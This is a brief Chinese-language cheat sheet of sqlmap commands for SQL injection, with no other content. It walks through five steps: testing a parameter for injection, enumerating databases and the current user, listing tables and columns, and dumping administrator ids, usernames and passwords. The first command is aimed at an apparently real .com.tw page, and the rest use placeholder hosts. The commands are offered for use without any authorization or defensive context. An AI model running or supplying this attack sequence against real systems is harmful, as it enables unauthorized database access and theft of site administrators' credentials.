SQLMAP注入常见用法
1.检查注入点
sqlmap -u http://www.com.tw/star_photo.php?artist_id=11
2.列数据库信息当前用户和数据库
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 --dbs --current-user --current-db
3.指定库名列出所有表
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL --tables
4.指定库名表名列出所有字段
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL -T DB_admin --columns
5.指定库名表名字段dump出指定字段
sqlmap -u http://www.xxxx.com/getcustomer.asp?q=1 -D xxxSQL -T admin -C id,,username,userpws --dump
浙公网安备 33010602011771号